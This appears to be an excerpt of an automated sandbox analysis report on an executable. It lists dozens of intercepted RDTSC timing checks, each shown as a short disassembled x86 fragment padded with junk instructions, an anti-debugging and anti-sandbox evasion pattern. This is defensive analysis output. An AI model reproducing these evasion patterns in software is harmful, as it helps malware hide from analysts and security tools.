                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75C942 second address: 75C99F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B35h 0x00000007 jc 00007F7290766B26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jmp 00007F7290766B39h 0x00000015 jmp 00007F7290766B39h 0x0000001a pop edi 0x0000001b push edx 0x0000001c push edx 0x0000001d pop edx 0x0000001e pop edx 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push esi 0x00000024 pop esi 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 75C99F second address: 75C9BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 712DA8 second address: 712E1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007F7290766B39h 0x00000010 jmp 00007F7290766B33h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a push edi 0x0000001b jnl 00007F7290766B26h 0x00000021 pop edi 0x00000022 pushad 0x00000023 jmp 00007F7290766B35h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b popad 0x0000002c mov eax, dword ptr [eax] 0x0000002e jmp 00007F7290766B32h 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 pushad 0x00000038 push edx 0x00000039 push esi 0x0000003a pop esi 0x0000003b pop edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 712EF7 second address: 712F15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F7290766B2Bh 0x00000011 jno 00007F7290766B26h 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7132C2 second address: 7132D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7290C62CA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7132D1 second address: 713316 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e movsx edx, cx 0x00000011 push 00000004h 0x00000013 mov dword ptr [ebp+150D228Dh], eax 0x00000019 pushad 0x0000001a add dword ptr [ebp+150D24C1h], ebx 0x00000020 jmp 00007F7290766B34h 0x00000025 popad 0x00000026 nop 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F7290766B2Dh 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713316 second address: 713321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F7290C62CA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 713AD7 second address: 713B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnc 00007F7290C62CBAh 0x00000010 nop 0x00000011 mov edx, dword ptr [ebp+150D291Eh] 0x00000017 or dx, AFC1h 0x0000001c lea eax, dword ptr [ebp+15280494h] 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F7290C62CA8h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c mov edx, dword ptr [ebp+150D271Fh] 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 je 00007F7290C62CA6h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 764037 second address: 764051 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7290766B26h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jo 00007F7290766B26h 0x00000013 jc 00007F7290766B26h 0x00000019 pop ebx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 764894 second address: 7648AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7290766B33h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7648AB second address: 7648BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F7290C62CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F7290C62CA6h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 769D51 second address: 769D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F7290766B2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7290766B37h 0x00000012 jmp 00007F7290766B2Ch 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6D5889 second address: 6D58CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F7290766B2Eh 0x0000000c pop edi 0x0000000d push edi 0x0000000e jmp 00007F7290766B38h 0x00000013 pop edi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F7290766B31h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76F30B second address: 76F315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76F32B second address: 76F34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290766B2Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F7290766B2Ah 0x00000014 push edi 0x00000015 pop edi 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76F5F3 second address: 76F60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7290C62CAAh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76F77C second address: 76F7B7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7290C62CA6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F7290C62CADh 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a jc 00007F7290C62CA6h 0x00000020 pushad 0x00000021 popad 0x00000022 jl 00007F7290C62CA6h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d jg 00007F7290C62CA6h 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 76FC42 second address: 76FC53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F7290766B2Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7757B5 second address: 775805 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F7290C62CACh 0x00000012 jc 00007F7290C62CA6h 0x00000018 jmp 00007F7290C62CB0h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7290C62CADh 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6C7FCF second address: 6C7FE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jng 00007F7290766B26h 0x0000000c je 00007F7290766B26h 0x00000012 popad 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6C7FE9 second address: 6C7FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7290C62CA6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6C7FF4 second address: 6C8021 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jns 00007F7290766B3Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7742CD second address: 774324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B38h 0x00000007 jns 00007F7290766B26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 jmp 00007F7290766B37h 0x00000015 jmp 00007F7290766B39h 0x0000001a pop esi 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 77448C second address: 7744C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F7290766B62h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7290766B36h 0x00000018 jmp 00007F7290766B30h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774615 second address: 77462B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7290C62CB2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 77463F second address: 77464E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CABh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7134BF second address: 71355F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7290766B26h 0x0000000a popad 0x0000000b jns 00007F7290766B38h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov ebx, dword ptr [ebp+1528048Fh] 0x0000001b js 00007F7290766B2Ah 0x00000021 mov di, A0DFh 0x00000025 add eax, ebx 0x00000027 mov dword ptr [ebp+150D1F6Eh], ecx 0x0000002d push eax 0x0000002e push edi 0x0000002f jmp 00007F7290766B2Ch 0x00000034 pop edi 0x00000035 mov dword ptr [esp], eax 0x00000038 mov edx, dword ptr [ebp+150D2247h] 0x0000003e push 00000004h 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007F7290766B28h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 0000001Ah 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a cld 0x0000005b nop 0x0000005c ja 00007F7290766B3Dh 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 push ebx 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774ABA second address: 774ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 jo 00007F7290766B26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 774AD7 second address: 774AE7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7290C62CA6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7754A8 second address: 7754B5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7754CF second address: 7754DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F7290C62CA6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 777F60 second address: 777F78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Fh 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 777F78 second address: 777F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7290C62CB1h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 778388 second address: 77839A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F7290C62CA6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7802FF second address: 78033E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7290766B32h 0x0000000d push esi 0x0000000e jne 00007F7290766B26h 0x00000014 jmp 00007F7290766B2Ah 0x00000019 pop esi 0x0000001a popad 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7290766B2Fh 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78033E second address: 780353 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F7290C62CAAh 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6DE0AE second address: 6DE0BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 6DE0BF second address: 6DE0D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7290766B2Dh 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 783E9A second address: 783EAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 783EB1 second address: 783EBC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F7290C62CA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 784184 second address: 784194 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7290766B32h 0x00000008 js 00007F7290766B26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 784194 second address: 7841B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jo 00007F7290C62CA6h 0x00000017 push edx 0x00000018 pop edx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7841B0 second address: 7841E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F7290766B26h 0x00000009 jmp 00007F7290766B32h 0x0000000e jmp 00007F7290766B38h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7848E9 second address: 7848FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007F7290C62CA6h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 789354 second address: 78937B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7290C62CA6h 0x00000008 jmp 00007F7290C62CACh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F7290C62CB1h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 78937B second address: 7893CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7290766B26h 0x00000009 jmp 00007F7290766B33h 0x0000000e jmp 00007F7290766B31h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 jmp 00007F7290766B2Ch 0x0000001e pop esi 0x0000001f pushad 0x00000020 jnc 00007F7290766B26h 0x00000026 pushad 0x00000027 popad 0x00000028 jc 00007F7290766B26h 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 794282 second address: 79428C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7927F6 second address: 792814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7290766B2Bh 0x0000000b jo 00007F7290766B2Ah 0x00000011 push edx 0x00000012 pop edx 0x00000013 pushad 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792DE5 second address: 792DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F7290766B26h 0x0000000a pop esi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792DF0 second address: 792E0E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007F7290C62CA6h 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 jo 00007F7290C62CA6h 0x0000001b pushad 0x0000001c popad 0x0000001d pop ecx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 792FC3 second address: 792FCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7290766B26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 791FE2 second address: 791FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7290766B26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 79BC47 second address: 79BC62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7290C62CACh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c ja 00007F7290C62CA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7A7117 second address: 7A7126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F7290766B26h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B1847 second address: 7B1872 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7290C62CB9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jo 00007F7290C62CC0h 0x00000012 push ebx 0x00000013 push edi 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B1872 second address: 7B1882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jl 00007F7290766B26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B0312 second address: 7B032A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290C62CB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B032A second address: 7B0362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7290766B2Bh 0x00000007 pushad 0x00000008 jmp 00007F7290766B39h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 push edx 0x00000018 pop edx 0x00000019 pop ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B036C second address: 7B0376 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7290C62CA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B037C second address: 7B0386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7290C62CA6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B038A second address: 7B039A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F7290C62CA6h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7B04F6 second address: 7B052D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7290766B26h 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7290766B30h 0x00000018 jmp 00007F7290766B34h 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C4B75 second address: 7C4B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7290766B26h 0x0000000a popad 0x0000000b jc 00007F7290766B2Eh 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C9D12 second address: 7C9D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7290C62CA6h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7C9A20 second address: 7C9A2A instructions: 0x00000000 rdtsc 0x00000002 js 00007F7290766B26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D00 second address: 7D4D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7290C62CABh 0x0000000c jmp 00007F7290C62CB6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D28 second address: 7D4D3D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F7290766B2Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D3D second address: 7D4D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7290C62CA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7290C62CABh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\DQmU06kq9I.exeRDTSC instruction interceptor: First address: 7D4D57 second address: 7D4D69 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7290766B26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F7290766B2Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
